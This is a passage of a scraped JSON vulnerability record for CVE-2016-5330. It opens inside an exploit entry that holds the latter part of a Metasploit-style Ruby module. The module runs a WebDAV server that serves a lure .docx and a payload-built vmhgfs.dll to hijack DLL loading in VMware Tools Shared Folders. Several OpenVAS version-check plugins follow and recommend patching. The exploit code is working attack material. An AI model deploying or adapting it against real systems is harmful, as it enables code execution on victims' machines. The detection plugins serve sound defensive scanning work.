= 'text/html'\r\n cli.send_response(resp)\r\n end\r\n end\r\n \r\n \r\n def process_get(cli, request)\r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n webdav = \"\\\\\\\\#{myhost}\\\\\"\r\n \r\n if (request.uri =~ /vmhgfs\\.dll$/i)\r\n print_status(\"GET => DLL Payload (#{request.uri})\")\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n data = generate_payload_dll({ :arch => target['Arch'], :code => p.encoded })\r\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n return\r\n end\r\n \r\n if (request.uri =~ /\\.docx$/i)\r\n print_status(\"GET => DOCX (#{request.uri})\")\r\n send_response(cli, \"\", { 'Content-Type' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document' })\r\n return\r\n end\r\n \r\n if (request.uri[-1,1] == \"/\" or request.uri =~ /index\\.html?$/i)\r\n print_status(\"GET => REDIRECT (#{request.uri})\")\r\n resp = create_response(200, \"OK\")\r\n resp.body = %Q|<html><head><meta http-equiv=\"refresh\" content=\"0;URL=file:\\\\\\\\#{@exploit_unc}#{datastore['SHARENAME']}\\\\#{datastore['BASENAME']}.docx\"></head><body></body></html>|\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n \r\n print_status(\"GET => 404 (#{request.uri})\")\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n end\r\n \r\n #\r\n # OPTIONS requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_options(cli, request)\r\n print_status(\"OPTIONS #{request.uri}\")\r\n headers = {\r\n 'MS-Author-Via' => 'DAV',\r\n 'DASL' => '<DAV:sql>',\r\n 'DAV' => '1, 2',\r\n 'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',\r\n 'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',\r\n 'Cache-Control' => 'private'\r\n }\r\n resp = create_response(207, \"Multi-Status\")\r\n 
headers.each_pair {|k,v| resp[k] = v }\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/xml'\r\n cli.send_response(resp)\r\n end\r\n \r\n #\r\n # PROPFIND requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_propfind(cli, request)\r\n path = request.uri\r\n print_status(\"PROPFIND #{path}\")\r\n body = ''\r\n \r\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n my_uri = \"http://#{my_host}/\"\r\n \r\n if path !~ /\\/$/\r\n \r\n if blacklisted_path?(path)\r\n print_status \"PROPFIND => 404 (#{path})\"\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n return\r\n end\r\n \r\n if path.index(\".\")\r\n print_status \"PROPFIND => 207 File (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 
'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n return\r\n else\r\n print_status \"PROPFIND => 301 (#{path})\"\r\n resp = create_response(301, \"Moved\")\r\n resp[\"Location\"] = path + \"/\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n end\r\n \r\n print_status \"PROPFIND => 207 Directory (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n \r\n if request[\"Depth\"].to_i > 0\r\n trail = path.split(\"/\")\r\n trail.shift\r\n case trail.length\r\n when 0\r\n body << generate_shares(path)\r\n when 1\r\n body << generate_files(path)\r\n end\r\n else\r\n print_status \"PROPFIND => 207 Top-Level Directory\"\r\n end\r\n \r\n body << \"</D:multistatus>\"\r\n \r\n body.gsub!(/\\t/, '')\r\n \r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n end\r\n \r\n def generate_shares(path)\r\n share_name = datastore['SHARENAME']\r\n%Q|\r\n<D:response xmlns:lp1=\"DAV:\" 
xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{share_name}/</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n \r\n def generate_files(path)\r\n trail = path.split(\"/\")\r\n return \"\" if trail.length < 2\r\n \r\n %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n \r\n def gen_timestamp(ttype=nil)\r\n ::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\r\n end\r\n \r\n def 
gen_datestamp(ttype=nil)\r\n ::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n end\r\n \r\n # This method rejects requests that are known to break exploitation\r\n def blacklisted_path?(uri)\r\n return true if uri =~ /\\.exe/i\r\n return true if uri =~ /\\.(config|manifest)/i\r\n return true if uri =~ /desktop\\.ini/i\r\n return true if uri =~ /lib.*\\.dll/i\r\n return true if uri =~ /\\.tmp$/i\r\n return true if uri =~ /(pcap|packet)\\.dll/i\r\n false\r\n end\r\n \r\n def exploit\r\n \r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']\r\n \r\n @exploit_unc = \"\\\\\\\\#{myhost}\\\\\"\r\n \r\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\r\n end\r\n \r\n print_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\")\r\n \r\n super\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27418"}], "openvas": [{"lastseen": "2019-12-19T16:04:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "A DLL hijacking vulnerability is present in the VMware Tools ", "modified": "2019-12-18T00:00:00", "published": "2016-08-05T00:00:00", "id": "OPENVAS:1361412562310105851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105851", "type": "openvas", "title": "VMware ESXi updates address multiple important security issues (VMSA-2016-0010)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2016-0010 (CVE-2016-5330) ESXi: VMware product updates address multiple important security issues\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you 
can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105851\");\n script_cve_id(\"CVE-2016-5330\");\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi updates address multiple important security issues (VMSA-2016-0010)\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"A DLL hijacking vulnerability is present in the VMware Tools 'Shared Folders' (HGFS)\n feature running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Exploitation of this issue may lead to arbitrary code execution with the privileges\n of the victim. 
In order to exploit this issue, the attacker would need write access to a network share and they\n would need to entice the local user into opening their document.\n\n Successfully exploiting this issue requires installation of 'Shared Folders' component (HGFS feature) which does not\n get installed in 'custom/typical' installation of VMware Tools on Windows VM running on ESXi.\");\n\n script_tag(name:\"affected\", value:\"ESXi 6.0 without patch ESXi600-201603102-SG\n\n ESXi 5.5 without patch ESXi550-201607102-SG\n\n ESXi 5.1 without patch ESXi510-201605102-SG\n\n ESXi 5.0 without patch ESXi500-201606102-SG\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 16:10:53 +0200 (Fri, 05 Aug 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"6.0.0\", \"VIB:tools-light:6.0.0-1.31.3568943\",\n \"5.5.0\", \"VIB:tools-light:5.5.0-3.86.4179631\",\n \"5.1.0\", \"VIB:tools-light:5.1.0-3.82.3872638\",\n \"5.0.0\", \"VIB:tools-light:5.0.0-3.87.3982819\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "scanner", "cvelist": 
["CVE-2016-5330"], "description": "The host is installed with\n VMware Tools and is prone to a privilege escalation vulnerability.", "modified": "2018-10-17T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809031", "type": "openvas", "title": "VMware Tools 'HGFS Feature' Privilege Escalation Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_tools_hgfs_feature_privilege_escalation_vuln.nasl 11938 2018-10-17 10:08:39Z asteins $\n#\n# VMware Tools 'HGFS Feature' Privilege Escalation Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:tools\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809031\");\n script_version(\"$Revision: 11938 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 12:08:39 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Tools 'HGFS Feature' Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Tools and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Tools 10.0.5.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Tools 10.0.6\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n 
script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_tools_detect_win.nasl\");\n script_mandatory_keys(\"VMwareTools/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmtoolVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version:vmtoolVer, test_version:\"10.0.5\"))\n{\n report = report_fixed_ver(installed_version:vmtoolVer, fixed_version:\"10.0.6\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.", "modified": "2018-10-24T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809023", "type": "openvas", "title": "VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_player_hgfs_privilege_escalation_vuln_lin.nasl 12051 2018-10-24 09:14:54Z asteins $\n#\n# VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809023\");\n script_version(\"$Revision: 12051 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 11:14:54 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation Player 12.1.x before\n 12.1.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation Player\n version 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.", "modified": "2018-10-16T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809021", "type": "openvas", "title": "VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_hgfs_privilege_escalation_vuln_win.nasl 11922 2018-10-16 10:24:25Z asteins $\n#\n# VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope 
that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809021\");\n script_version(\"$Revision: 11922 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-16 12:24:25 +0200 (Tue, 16 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation version 12.1.x before\n 12.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 12.1.1 or later.\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with VMware Fusion\n and is prone to a privilege escalation vulnerability.", "modified": "2018-10-15T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809020", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809020", "type": "openvas", "title": "VMware Fusion 'HGFS' Feature Privilege Escalation Vulnerability (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_fusion_hgfs_privilege_escalation_vuln_macosx.nasl 11903 2018-10-15 10:26:16Z asteins $\n#\n# VMware Fusion 'HGFS' Feature Privilege Escalation Vulnerability (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 
Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:fusion\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809020\");\n script_version(\"$Revision: 11903 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-15 12:26:16 +0200 (Mon, 15 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_name(\"VMware Fusion 'HGFS' Feature Privilege Escalation Vulnerability (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Fusion\n and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Fusion 8.1.x before 8.1.1 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Fusion version\n 8.1.1 or later.\");\n\n script_tag(name:\"solution_type\", 
